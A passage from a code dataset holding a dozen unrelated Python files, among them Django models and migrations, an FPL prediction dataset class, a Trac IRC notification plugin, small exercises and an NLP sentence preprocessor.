def get_search_sliders():\n answer = dict()\n for field in Place._meta.fields:\n if field.name in Place._SLIDERS:\n answer[field.name] = field.verbose_name, \\\n [Place.objects.all().aggregate(models.Min(field.name)).values()[0],\n Place.objects.all().aggregate(models.Max(field.name)).values()[0]]\n\n return answer\n","sub_path":"rentsite/rent_site/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"380294482","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('agent', '0023_auto_20151120_2009'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='allocation_distance',\n field=models.DecimalField(null=True, max_digits=5, decimal_places=2),\n ),\n ]\n","sub_path":"backend/agent/migrations/0024_order_allocation_distance.py","file_name":"0024_order_allocation_distance.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614392911","text":"import pandas as pd\nimport numpy as np\nimport utils.utils as ut\n\nfrom pathlib import PosixPath, WindowsPath\nfrom sklearn.preprocessing import FunctionTransformer,\\\n StandardScaler\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.model_selection import train_test_split\n\n\nclass Dataset(object):\n \"\"\"\n The dataset object for FPL optimiser\n It supports fetching the latest data from the database or from csv\n\n Args:\n window (int) - The game week window size of the features.\n For example, 10 means 10 weeks of metrics\n will be used as features\n \"\"\"\n\n def __init__(self, window=10, source=\"csv\", path=None, conn=None):\n self.dataset = None\n self.players = None\n self.transformed_dataset = None\n self.dropped_columns = None\n self.window = window\n self.path = path\n self.conn = conn\n\n if source == \"csv\":\n self._fetch_data_from_csv(path)\n elif source == \"db\":\n self._fetch_data_from_db(conn)\n else:\n raise ValueError(\"Please select source from either `csv` or `db`\")\n\n def get_dataset(self, target, mode=\"full\", binning=True,\n transformed=True):\n \"\"\"\n A function that help to split the dataset into k fold and\n train test dataset\n\n Args:\n df (pd.DataFrame) - The original data frame\n target (str) - The target column name\n mode (str) - Either `full`, `split`.\n `full` means returning the whole transformed DataFrame\n in the class\n\n `split` means returning the train test split dataframe\n This will return a tuple of (train, eval, test)\n transformed (boolean) - Return transformed dataset if True\n\n Return:\n pd.DataFrame or tuple(X_train (pd.DataFrame), X_eval(pd.DataFrame),\n y_train(pd.DataFrame), y_eval (pd.DataFrame),\n X_test (pd.DataFrame), y_test (pd.DataFrame))\n\n \"\"\"\n\n if binning:\n target = target + \"_binned\"\n\n if mode == \"full\":\n if transformed:\n return self.transformed_dataset\n else:\n return self.dataset\n\n elif mode == \"split\":\n\n if transformed:\n _ds = self.transformed_dataset\n else:\n _ds = self.dataset\n\n _train = _ds[_ds[\"game_year\"] != 1819].copy()\n _test = _ds[_ds[\"game_year\"] == 1819].copy()\n\n _train.drop(\"game_year\", axis=1, inplace=True)\n _test.drop(\"game_year\", axis=1, inplace=True)\n\n # Apply train_test_split on train\n X_train, X_eval, y_train, y_eval = \\\n 
train_test_split(_train.drop(target, axis=1),\n _train[target].values,\n test_size=0.33,\n random_state=42)\n\n X_test = _test.drop(target, axis=1)\n y_test = _test[target].values.reshape(-1, 1)\n\n print(\"Transformed number of feature columns: %s\"\n % len(X_train.columns))\n print(X_train.columns)\n\n return (X_train, y_train, X_eval, y_eval, X_test, y_test)\n\n elif mode == \"kfold\":\n pass\n\n else:\n raise ValueError(\"Please choose either `full`, `split` or `kfold`\")\n\n def get_players(self):\n return self.players\n\n def _fetch_data_from_db(self, conn):\n pass\n\n def _fetch_data_from_csv(self, path, return_as_pd=True):\n \"\"\"\n A function to fetch data from complete csv\n\n Args:\n path (str or pathlib.path): The path of the complete csv file.\n The complete csv file is a fact table\n file that contains all the game records\n\n Returns:\n pandas.DataFrame: Return a dataframe that is clean and ready for\n training\n\n \"\"\"\n\n if type(path) is PosixPath or type(path) is WindowsPath:\n path = str(path/'complete_merged.csv')\n else:\n raise TypeError(\"Path is not a PosixPath/WindowsPath\")\n\n self.dataset = pd.read_csv(path, encoding=\"ISO-8859-1\")\n\n # self.dataset, self.dropped_columns = \\\n # self._construct_player_ts_featureset(df, self.window)\n\n self.transformed_dataset = self._transform_dataset(\n self.dataset,\n target_name=\"total_points\",\n return_as_pd=True)\n\n print(\"Feature engineering done. \")\n\n print(\"Extracting the players information...\", end=\"\")\n\n if return_as_pd:\n print(\"Original number of feature columns: %s\"\n % len(self.dataset.columns))\n print(self.dataset.columns)\n else:\n print(\"Shape of dataset: %s\" % self.dataset.shape)\n\n # def _construct_player_ts_featureset(self, df, window):\n # \"\"\"\n # A function that group the long time series dataframe with all players\n # into a feature set that has the players as primary keys.\n #\n # Args:\n # df (pd.Dataframe) - A long dataframe that each row of record\n # represents the observation metrics\n # and the respective score of each player\n # at his respective game week.\n #\n # window (int) - The game week window size of the features.\n # For example, 10 means 10 weeks of metrics\n # will be used as features\n # Returns:\n # pandas.DataFrame: A cleaned dataframe with rolling averages\n #\n # \"\"\"\n #\n # # Make sure the dataframe is in the right order\n # # df = pd.read_csv(\"./data/complete.csv\", encoding=\"ISO-8859-1\")\n # df = (df.sort_values([\"code\", \"game_year\", \"round\"])\n # .reset_index(drop=True))\n #\n # columns_to_drop = [\"id\", \"kickoff_time\", \"kickoff_time_formatted\",\n # \"element\", \"loaned_in\", \"loaned_out\",\n # \"opponent_team\", \"round\", \"fixture\", \"was_home\",\n # \"ea_index\", \"game_year\", \"id_of_year\", \"name\",\n # \"lower_name\", \"NextFixture1\", \"Team\", \"PositionsList\"]\n #\n # columns_dropped_slice = df[columns_to_drop]\n # subset_df = df.drop(columns_to_drop, axis=1)\n # rolling_mean_features = (subset_df\n # .groupby(\"code\")\n # .rolling(window, min_periods=1)\n # .agg(\"mean\"))\n # rolling_mean_features_pct_change = \\\n # (subset_df\n # .groupby(\"code\")[\"transfers_balance\",\n # \"value\"]\n # .diff(window-1)\n # .rename(\n # columns={\n # \"transfers_balance\": \"transfer_balance_growth\",\n # \"value\": \"value_growth\"\n # }, index=str)\n # .reset_index(drop=True))\n #\n # rolling_mean_features = rolling_mean_features.reset_index(drop=True)\n #\n # rolling_mean_features = pd.concat([rolling_mean_features,\n # 
rolling_mean_features_pct_change],\n # axis=1)\n #\n # rolling_mean_features['transfer_balance_growth'] = \\\n # (rolling_mean_features[\"transfer_balance_growth\"]\n # .replace(np.inf, 0)\n # .replace(-np.inf, 0))\n #\n # rolling_mean_features['value_growth'] = \\\n # (rolling_mean_features[\"value_growth\"]\n # .replace(np.inf, 0)\n # .replace(-np.inf, 0))\n #\n # # Adding new features on the next game\n # rolling_mean_features[\"next_home\"] = \\\n # df.groupby([\"code\"])[\"was_home\"].shift(-1)\n #\n # rolling_mean_features[\"NextFixture1\"] = \\\n # df.groupby([\"code\"])[\"NextFixture1\"].shift(-2)\n #\n # rolling_mean_features[\"next_round\"] = \\\n # df.groupby([\"code\"])[\"round\"].shift(-1)\n #\n # rolling_mean_features[\"target\"] = \\\n # df.groupby([\"code\"])[\"total_points\"].shift(-1)\n #\n # rolling_mean_features[\"game_year\"] = \\\n # df.groupby([\"code\"])[\"game_year\"].shift(-1)\n #\n # rolling_mean_features[\"team\"] = \\\n # df.groupby([\"code\"])[\"Team\"].shift(-1)\n #\n # rolling_mean_features[\"position\"] = \\\n # df.groupby([\"code\"])[\"PositionsList\"].shift(-1)\n #\n # # Then subset only the window size + rows from each group\n # rolling_mean_features = (rolling_mean_features\n # .groupby(\"code\", group_keys=False)\n # .apply(lambda x: x.iloc[window-1:-1]))\n #\n # rolling_mean_features = rolling_mean_features.dropna()\n #\n # return rolling_mean_features, columns_dropped_slice\n\n def _construct_player_base_dataset(self, df):\n \"\"\"\n Extract the base/lifetime information of a player to support the\n time series prediction\n \"\"\"\n df = pd.read_csv(\"./data/complete_merged.csv\", encoding=\"ISO-8859-1\")\n self.players = (df.groupby([\"code\", \"name\"],\n group_keys=False, as_index=False)\n .count())[[\"code\", \"name\"]]\n\n def _transform_dataset(self, df, target_name, return_as_pd=False):\n \"\"\"\n Dataset transformation Function\n\n Args:\n df (pandas.Dataframe) - Original dataset\n\n Return:\n pandas.DataFrame - A transformed dataset\n \"\"\"\n\n print(\"Performing one hot encoding...\")\n # df['next_opponent'] = df.next_opponent.astype('int').astype('object')\n categorical_onehot = pd.get_dummies(df.select_dtypes('object'))\n # categorical_onehot.drop(\"next_home_False\", axis=1, inplace=True)\n # categorical_onehot.drop(\"NextFixture1_Wolverhampton\", axis=1, inplace=True)\n # categorical_onehot.drop(\"PositionsList_MID\", axis=1, inplace=True)\n # categorical_onehot.drop(\"Team_\", axis=1, inplace=True)\n # categorical_onehot.drop(\"next_opponent_20\", axis=1, inplace=True)\n\n print(categorical_onehot.columns)\n\n df.drop([\"NextFixture1\",\n \"Team\",\n \"PositionsList\"], axis=1, inplace=True)\n df = pd.concat([df, categorical_onehot], axis=1)\n\n # Split the data into target and features\n target = df[target_name].values\n print(\"target: \", target)\n features = df.drop(target_name, axis=1)\n feature_names = features.columns\n\n feature_pipeline = Pipeline([\n ('features',\n FeatureUnion(n_jobs=-1, transformer_list=[\n ('numericals', Pipeline([\n ('selector', ut.TypeSelector('float')),\n ('scaler', StandardScaler())\n ])),\n ('others', Pipeline([\n ('selector', ut.TypeSelector('uint8'))]))\n ]))\n ])\n\n target_pipeline = Pipeline([\n ('addbase',\n FunctionTransformer(lambda x: x + 3)),\n ('log', FunctionTransformer(np.sqrt))\n ])\n\n transformed_features = feature_pipeline.fit_transform(features)\n # transformed_target = (target_pipeline\n # .fit_transform(target.reshape(-1, 1)))\n\n target_binned = self._bin_target(target)\n 
target_binned = target_binned.astype(\"category\").codes\n\n print(transformed_features.shape)\n print(len(feature_names))\n\n if return_as_pd:\n transformed_df = pd.DataFrame(features)\n transformed_df.columns = feature_names\n # transformed_df[\"target\"] = transformed_target\n # Add Target binning for the non-zeros\n transformed_df[\"target_binned\"] = target_binned\n\n return transformed_df\n else:\n transformed_data = np.append(transformed_features,\n target_binned,\n axis=1)\n return transformed_data\n\n def _bin_target(self, target):\n \"\"\"\n A binning function to bin the target\n \"\"\"\n print(target)\n bin_ranges = [-np.Inf, 0, 1, 3, 5, 8, np.Inf]\n bin_labels = [\"0\", \"0-1\", \"1-3\", \"3-5\", \"5-8\", \"8+\"]\n\n target_binned = pd.cut(target, bins=bin_ranges, labels=bin_labels)\n print(\"target_binned: \", target_binned.value_counts())\n\n return target_binned\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":13214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"654112533","text":"\n#\n# This is a birthday tracker for some set of\n# people - and a small piece of i/o. We will\n# list the poeple for the user, and the user\n# will choose a person and we will display\n# their birthday... and that's it! \n#\n\nclass box:\n\tdef __init__(self, birthday, fname, lname):\n\t\tself.birthday = birthday\n\t\tself.fname = fname\n\t\tself.lname = lname\n\n\tdef getBirthday(self):\n\t\treturn self.birthday\n\n\tdef getFName(self):\n\t\treturn self.fname\n\n\tdef getLName(self):\n\t\treturn self.lname\t\n\n\tdef setLName(self, lname):\n\t\tself.lname = lname\n\n\tdef setFName(self, fname):\n\t\tself.fname = fname\n\n\tdef setBirthday(self, bday):\n\t\tself.birthday = bday\n\nbirthdayBox = []\nnames = [{'fname':'Joey', 'lname':'Uberman', 'birthday':'03/30/58'},\n{'fname':'Madge', 'lname':'Hinterspall', 'birthday':'05/19/72'},\n{'fname':'Irving', 'lname':'Dagall', 'birthday':'09/12/1924'}]\n\ndef fillData():\n\tfor i in range(3):\n\t\tfname = input(\"Enter first name: (enter for default) \")\n\t\tif len(fname) < 3:\n\t\t\tfname = names[i]['fname']\n\t\t\tlname = names[i]['lname']\n\t\t\tbirthday = names[i]['birthday']\n\t\telse:\n\t\t\tlname = input(\"Enter last name: \")\n\t\t\tbirthday = input(\"Enter birthday: \")\n\n\t\tb = box(birthday, fname, lname)\n\t\tbirthdayBox.append(b)\n\ndef showData():\n\tfor i in range(len(birthdayBox)):\n\t\tprint(\"Person: \" + birthdayBox[i].fname + \" \" + birthdayBox[i].lname)\n\ndef getName():\n\tname = input(\"Enter the name you want to lookup: \")\n\tn = name.split(' ')\n\treturn getBirthday(n)\n\ndef getBirthday(name):\n\tif(len(name)) < 2:\n\t\tfname = name[0]\n\telse:\n\t\tfname = name[0]\n\t\tlname = name[1]\n\n\tfound = False\n\tfor n in birthdayBox:\n\t\tif n.fname == fname:\n\t\t\treturn n.birthday\n\tfor n in birthdayBox:\n\t\tif n.lname == lname:\n\t\t\treturn n.birthday\n\n\t\t\nfillData()\nshowData()\t\t\nprint(getName())\n\n\n","sub_path":"python/Projects/proj6/bday.py","file_name":"bday.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"40906950","text":"## weight of widgets and gizmos\n\nw_gizmo = 112\nw_widget = 75\n\nwidget_no = float(input(\"How many widgets would you like to order:\"))\ngizmo_no = float(input(\"How many gizmos would you like to order: \"))\n\nweight = (w_gizmo*gizmo_no) + (w_widget*widget_no)\n\nprint(\"Total weight of order: 
%.2f g\" %weight)\n","sub_path":"1 Intro excercises (math operators)/Ex_8.py","file_name":"Ex_8.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"355632233","text":"\r\n\r\ncars = [] #所有车辆列表\r\nustomers = [] #所有客户列表\r\ndef __load_cars():#加载所有车辆信息\r\n try:\r\n f1 = open('vehicle_information.txt',encoding='utf-8')\r\n try:\r\n while True:\r\n lin1 = f1.readline() #每次取一行信息\r\n if not lin1: #到达文件尾\r\n break\r\n lst =lin1.strip()\r\n s = lst.split(',')\r\n car_id = s[0]\r\n name= s[1]\r\n is_lend = s[2]\r\n price = s[3]\r\n time1 = s[4]\r\n time2 = s[5]\r\n dict = {'car_id':car_id,'name':name,\r\n 'is_lend':is_lend,'price':price,\r\n 'start_date':time1,'end_date':time2}\r\n cars.append(dict)\r\n print(\"加载车辆信息成功\")\r\n except:\r\n f1.close()\r\n except OSError:\r\n print(\"加载车辆信息失败\")\r\n finally:\r\n f1.close()\r\n\r\n\r\n","sub_path":"python/dazhewan/day19/homework/lianxi.py","file_name":"lianxi.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"620400144","text":"m, n = [int(t) for t in raw_input().split(' ')]\nnums = [int(t) for t in raw_input().split(' ')]\nd = {}\nfor i, v in enumerate(nums):\n\tif(v in d):\n\t\tif(d[v][-1][1] == i):\n\t\t\td[v][-1][1] = i + 1\n\t\telse:\n\t\t\td[v].append([i + 1, i + 1])\n\telse:\n\t\td[v] = [[i + 1, i + 1], ]\n\n# print(d)\nfor i in range(n):\n\tl, r, v = [int(t) for t in raw_input().split(' ')]\n\n\tif(v in d):\n\t\tstart, end = 0, len(d[v]) - 1\n\t\tmiddle = (start + end) // 2\n\n\t\twhile(start < end):\n\t\t\tmiddle = (start + end) // 2\n\t\t\t# print(start, middle, end)\n\t\t\tif(d[v][middle][0] <= l <= d[v][middle][1]):\n\t\t\t\tbreak\n\t\t\telif(d[v][middle][0] > l):\n\t\t\t\tend = middle - 1\n\t\t\telse:\n\t\t\t\tstart = middle + 1\n\t\t\n\t\tif(d[v][start][0] <= l <= d[v][start][1]):\n\t\t\tmiddle = start\n\n\t\tif(d[v][middle][0] <= l <= d[v][middle][1]):\n\t\t\tif(d[v][middle][1] < r):\n\t\t\t\tprint(d[v][middle][1] + 1)\n\t\t\telse:\n\t\t\t\tprint(-1)\n\t\telse:\n\t\t\tprint(l)\n\telse:\n\t\tprint(l)","sub_path":"online_judge/codeforces/622, Educational Codeforces Round 7/C. Not Equal on a Segment.py","file_name":"C. 
Not Equal on a Segment.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"117336140","text":"# _*_ coding:utf-8 _*_\n\nimport copy\nfrom Binary import to_object\nfrom BinaryReader import BinaryReader\n\nclass MessageCenter:\n __instance = None\n\n @staticmethod\n def get_instance():\n if None is MessageCenter.__instance:\n MessageCenter.__instance = MessageCenter()\n return MessageCenter.__instance\n\n def __init__(self):\n self.__message_callback = dict()\n self.__message_type = dict()\n\n def register(self, inst, call_back):\n self.__message_callback[inst.MID] = call_back\n self.__message_type[inst.MID] = inst\n\n def process(self, binary_reader):\n inst = None\n mid = binary_reader.read_next()\n # 复制原型\n if self.__message_type.has_key(mid):\n inst_prototype = self.__message_type[mid]\n version = binary_reader.read_string()\n # 检查版本号\n if str(inst_prototype.get_version()) != version:\n print(\"error: The version number is not equal\")\n return\n inst = copy.deepcopy(inst_prototype)\n to_object(binary_reader, inst)\n # 根据MID获取回调\n if None is not inst:\n if not self.__message_callback.has_key(mid):\n print(\"error: Without the message callback methods\")\n return\n message_callBack = self.__message_callback[mid]\n message_callBack(inst)\n\n","sub_path":"Sloth/MessageCenter.py","file_name":"MessageCenter.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"260375601","text":"from django.urls import path\nfrom .import views\n\n\nurlpatterns = [\n path(\"\", views.student, name=\"student\"),\n path(\"ranklist/\", views.ranklist, name=\"ranklist\"),\n path(\"performance//\", views.performance, name=\"performance\"),\n path(\"notification/\", views.view_notification, name=\"view_notification\"),\n path(\"addExam/\", views.add_exam, name=\"add_exam\"),\n path(\"showStudent//\", views.show_student, name=\"show_student\"),\n path(\"addStudent/\", views.add_student, name=\"add_student\"),\n path(\"updateStudent//\", views.update_student, name=\"update_student\"),\n path('delete//', views.delete_data, name=\"deletedata\"),\n path('delete_notification//',\n views.delete_notification, name=\"delete_notification\"),\n path('/addResult', views.add_result, name=\"add_result\"),\n]\n","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"358469848","text":"#-*-coding:utf-8 -*\nimport os # on importe le module os\n\nchaine = input(\"Tapez le titre en minuscules : \")\nchaine = chaine.upper().center(50)\nprint (chaine)\n\nwhile chaine.lower() != \"q\":\n\tprint(\"Tapez 'Q' pour quitter...\")\n\tchaine = input()\nprint(\"Merci !\")\n\nos.system(\"pause\")","sub_path":"Partie_2/3.mef.py","file_name":"3.mef.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"339168637","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2017 Miklos Molnar\r\n#\r\n# All rights reserved.\r\n#\r\n# This software is licensed as described in the file README.md, which\r\n# you should have received as part of this distribution.\r\n\r\nfrom trac.core import Component, implements\r\nfrom trac.notification.api import (\r\n NotificationEvent, NotificationSystem, INotificationFormatter)\r\nfrom trac.web.api 
import IRequestFilter, ITemplateStreamFilter\r\nfrom trac.web.chrome import add_notice\r\nfrom trac.wiki.api import IWikiChangeListener\r\nfrom trac.util.translation import _\r\n\r\nfrom genshi.builder import tag\r\nfrom genshi.filters.transform import Transformer\r\nfrom genshi.input import HTML\r\nfrom genshi.output import HTMLSerializer\r\n\r\nfrom subscription import SubscriptionHandler\r\n\r\n\r\n# ==================== Notification events ====================\r\nclass WikiPageChangeEvent(NotificationEvent):\r\n \"\"\"Represent a wiki page change `NotificationEvent`.\"\"\"\r\n\r\n def __init__(self, category, target, time, author, comment=None,\r\n changes=None):\r\n super(WikiPageChangeEvent, self).__init__('wikipage', category, target,\r\n time, author)\r\n self.comment = comment\r\n self.changes = changes or {}\r\n\r\n\r\n# ==================== Notification formatters ====================\r\nclass ShortIrcNotificationFormatter(Component):\r\n\r\n implements(INotificationFormatter)\r\n\r\n # Supported styles\r\n support_styles = [('text/irc', 'ticket'), ('text/irc', 'wikipage')]\r\n\r\n # INotificationFormatter methods\r\n def get_supported_styles(self, transport):\r\n if transport == 'irc':\r\n for style in self.support_styles:\r\n yield style\r\n\r\n def format(self, transport, style, event):\r\n if transport != 'irc':\r\n return ''\r\n\r\n comment = self.smart_truncate(event.comment)\r\n if event.realm == 'ticket':\r\n return \"Ticket #{0} | {1} by {2} | Comment: {3} | {4}\" \\\r\n .format(event.target.id, event.category, event.author,\r\n comment, self.env.abs_href.ticket(event.target.id))\r\n if event.realm == 'wikipage':\r\n return \"Page '{0}' | {1} by {2} | Comment: {3} | {4}\" \\\r\n .format(event.target.name, event.category, event.author,\r\n comment, self.env.abs_href.wiki(event.target.name))\r\n return ''\r\n\r\n # helper functions\r\n def smart_truncate(self, content, length=80, suffix='...'):\r\n if len(content) <= length:\r\n return content\r\n else:\r\n return ' '.join(content[:length + 1].split(' ')[0:-1]) + suffix\r\n\r\n\r\n# ==================== Notification plugin ====================\r\nclass IrkerNotifcationPlugin(Component):\r\n implements(IWikiChangeListener, ITemplateStreamFilter, IRequestFilter)\r\n MODULE_NAME = 'irker_plugin'\r\n\r\n # IRequestFilter methods\r\n def pre_process_request(self, req, handler):\r\n \"\"\"Handles requests containing subscription related actions\r\n like subscribe and unsubscribe.\"\"\"\r\n if not req.session.authenticated:\r\n return handler\r\n if req.method == 'GET' and 'subscribe' in req.args:\r\n if req.args.get('subscribe') == 'Subscribe':\r\n if not SubscriptionHandler. 
\\\r\n is_session_subscribed_for_ticket_changes(\r\n self.env, req.session.sid):\r\n SubscriptionHandler.add_subscription(\r\n self.env, self.log, req.session.sid,\r\n 'ResourceChangeIrcSubscriber')\r\n prev_subs = req.session.get('subscriptions', '')\r\n if len(prev_subs) == 0:\r\n req.session['subscriptions'] = req.path_info\r\n else:\r\n req.session['subscriptions'] = \\\r\n req.session['subscriptions'] + ', %s' % req.path_info\r\n req.session.save()\r\n add_notice(req, _('You have subscribed successfully!'))\r\n else:\r\n updated_subscriptions = \\\r\n [x.strip() for x in req.session['subscriptions'].\r\n split(',') if not x.strip() == req.path_info]\r\n req.session['subscriptions'] = ', '.join(updated_subscriptions)\r\n req.session.save()\r\n add_notice(req, _('You have unsubscribed successfully!'))\r\n return handler\r\n\r\n def post_process_request(self, req, template, data, content_type):\r\n return template, data, content_type\r\n\r\n # ITemplateStreamFilter methods\r\n def filter_stream(self, req, method, filename, stream, data):\r\n \"\"\"Returns a transformed stream extended with irc subscribe button.\"\"\"\r\n if not req.session.authenticated:\r\n return stream\r\n\r\n # Applying changes on ticket.html\r\n if filename == 'ticket.html':\r\n stream = stream | Transformer(\r\n 'body//div[@class=\"trac-content \"]').\\\r\n prepend(HTML(self._get_button_html(req)))\r\n self.log.debug('#IrkerNotifcationPlugin filter_stream')\r\n\r\n if filename == 'wiki_view.html':\r\n stream = stream | Transformer(\r\n 'body//div[@id=\"wikipage\"]').\\\r\n prepend(HTML(self._get_button_html(req)))\r\n self.log.debug('#IrkerNotifcationPlugin filter_stream')\r\n return stream\r\n\r\n def wiki_emit_event(self, page, action, time, author):\r\n event = WikiPageChangeEvent(action, page, time, author, page.comment)\r\n try:\r\n NotificationSystem(self.env).notify(event)\r\n except Exception as e:\r\n self.log.error(\"Failure sending notification when wiki page\"\r\n \" '%s' has changed: %s \",\r\n page.name, exception_to_unicode(e))\r\n\r\n def wiki_page_added(self, page):\r\n self.wiki_emit_event(page, 'added', None, page.author)\r\n\r\n def wiki_page_changed(self, page, version, t, comment, author, ipnr):\r\n self.wiki_emit_event(page, 'changed', t, page.author)\r\n\r\n def wiki_page_deleted(self, page):\r\n self.wiki_emit_event(page, 'deleted', None, '')\r\n\r\n def wiki_page_version_deleted(self, page):\r\n self.wiki_emit_event(page, 'version_deleted', None, '')\r\n\r\n # helper functions\r\n def _get_button_html(self, req):\r\n \"\"\"The construction of subscribe button.\"\"\"\r\n # TODO replace with genshi builder\r\n button = u''''''\r\n if SubscriptionHandler.\\\r\n is_session_subscribed_to(self.env, req.session.sid,\r\n req.path_info):\r\n button = button % (_('Unsubscribe'), _(\r\n 'Unsubscribe from IRC notifications'))\r\n else:\r\n button = button % (_('Subscribe'), _(\r\n 'Subscribe to IRC notifications'))\r\n\r\n return u'''\r\n
            <form action=\"%s\" method=\"get\">\r\n                %s\r\n            </form>
\r\n ''' % (req.href + req.path_info, button)\r\n","sub_path":"irker_notification/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"617141822","text":"\"\"\"\r\n《幸运的基督徒》\r\n有15个基督徒和15个非基督徒在海上遇险\r\n,为了能让一部分人活下来不得不将其中\r\n15个人扔到海里面去,有个人想了个办法\r\n就是大家围成一个圈,由某个人开始从1报数,\r\n报到9的人就扔到海里面,他后面的人接着从\r\n1开始报数,报到9的人继续扔到海里面,直到\r\n扔掉15个人。由于上帝的保佑,15个基督徒都\r\n幸免于难,问这些人最开始是怎么站的,哪\r\n些位置是基督徒哪些位置是非基督徒。\r\n\"\"\" \r\ndef main():\r\n\tpersons = [0]*30\r\n\tcounter,index,number=0,0,0\r\n\twhile counter <15 :\r\n\t\tif persons[index] == 0:\r\n\t\t\tnumber += 1\r\n\t\t\tif number == 9:\r\n\t\t\t\tpersons[index] = 1\r\n\t\t\t\tcounter += 1\r\n\t\t\t\tnumber = 0\r\n\t\tindex += 1\r\n\t\tindex %= 30\r\n\tfor person in persons:\r\n\t\tif person == 0:\r\n\t\t\tprint('基督 ',end=\"\")\r\n\t\telse:\r\n\t\t\tprint('非基督 ',end=\"\")\r\n\t\t\t\t\t\t\r\nif __name__ == '__main__':\r\n main()","sub_path":"约瑟夫问题.py","file_name":"约瑟夫问题.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"3564306","text":"import nltk\nfrom stanfordcorenlp import StanfordCoreNLP\n\nnltk.download('wordnet')\n\ndef sentence_preprocess(_sentence):\n\n # Change sentence to lower_case except slack code(<@ABCDEFGHI>) and file name(File.py)\n punc_list = [\"!\", \"?\", \",\", \".\", \"’\"]\n\n # Please preserve the order of elements in replace_list.\n replace_list = [(\" please \", \" \"), (\" hey \", \" \"), (\" i think \", \" \"),\n (\" can't \", \" can not \"), (\" won't \", \" will not \"), (\"n't \", \" not \"),\n (\" do not have to \", \" should not \"),\n (\" have to \", \" should \"), (\" ought to \", \" should \"), (\" ought not to \", \" should not \"),\n (\" got to \", \" should \"), (\" gotta \", \" should \"),\n (\" wanna \", \" want to \"),\n (\"'m \", \" am \"), (\"'ve \", \" have \"), (\"'re \", \" are \"),\n (\" where's \", \" where is \"), (\" what's \", \" what is \"), (\" who's \", \" who is \"), (\" how's \", \" how is \"), (\" why's \", \" why is \"),\n (\" the \", \" \"), (\" a \", \" \"), (\" an \", \" \")]\n # can't -> can not, won't -> will not\n # shouldn't -> should not, wouldn't -> would not, couldn't -> could not , don't -> do not, haven't -> have not\n\n sentence = _sentence.lstrip(\"!,.? \").lower()\n\n for punc in punc_list:\n if punc == \"’\":\n sentence = sentence.replace(punc, \"'\")\n if punc != \".\":\n sentence = sentence.replace(punc, \" \" + punc + \" \")\n\n sentence = \" \" + sentence + \" \"\n\n for replace_tag in replace_list:\n sentence = sentence.replace(replace_tag[0], replace_tag[1])\n\n # Exception handling : Sentence with Sayme (ex : Sayme,.!? Sayme,?.! Could you help me?)\n # Extract all of \"sayme\", if the verb doesn't follow \"sayme\"\n sentence = sentence.lstrip(\"!.,? \")\n if sentence.startswith(\"sayme\"):\n without_sayme_st = sentence.replace(\"sayme\",\"\").lstrip()\n count = 0\n for punc in punc_list:\n if not without_sayme_st.startswith(punc) and punc != \"’\":\n count = count + 1\n if count != 4:\n sentence = without_sayme_st.lstrip(\"!?,. 
\")\n\n word_list = sentence.split()\n for word in word_list:\n word_idx = word_list.index(word)\n if word.find(\"<@\") != -1 and word[word.find(\"<@\") + 11] == \">\":\n modified_word = word.upper()\n elif \".py\" in word or \".md\" in word or \".txt\" in word or \".json\" in word:\n file_idx = _sentence.lower().find(word)\n modified_word = _sentence[file_idx:file_idx + len(word)]\n else:\n if word == \"i\":\n modified_word = word[0].upper() + word[1:]\n elif word == \"sayme\":\n modified_word = \"you\"\n else:\n modified_word = word.replace(\".\", \" .\") #for detecting word\n word_list[word_idx] = modified_word\n\n sentence = ' '.join(word_list)\n sentence = sentence.strip()\n sentence = \" \" + sentence + \" \"\n\n return sentence\n\ndef is_question(_sentence, pos_tag_list, nlp):\n sentence = (_sentence.rstrip(\" .,!?\") + \" / ?\").replace(\" not \", \" \", 1)\n print(sentence)\n parse_list = nlp.parse(sentence)\n print(\"parse_list\", parse_list)\n if (\"SBARQ\" in parse_list or \"SQ\" in parse_list) and pos_tag_list[0][1] != \"VB\":\n return True\n else:\n for pos_tag in pos_tag_list:\n if pos_tag[0] == \"how\" or pos_tag[0] == \"what\":\n pos_idx = pos_tag_list.index((pos_tag[0], pos_tag[1]))\n if pos_tag_list[pos_idx + 1][0] == \"about\":\n return True\n return False\n\ndef is_command(_sentence, nlp):\n # sentence 제일 앞에 modal 추가\n sentence = \"Must \" + _sentence\n pos_tag_list = nlp.pos_tag(sentence)\n\n for pos_tag in pos_tag_list:\n if pos_tag[1] == \"RB\" or pos_tag[1] == \"MD\":\n pass\n elif (pos_tag[1] == \"VB\" and pos_tag[0] != \"sayme\") or pos_tag[1] == \"VBP\":\n return True\n 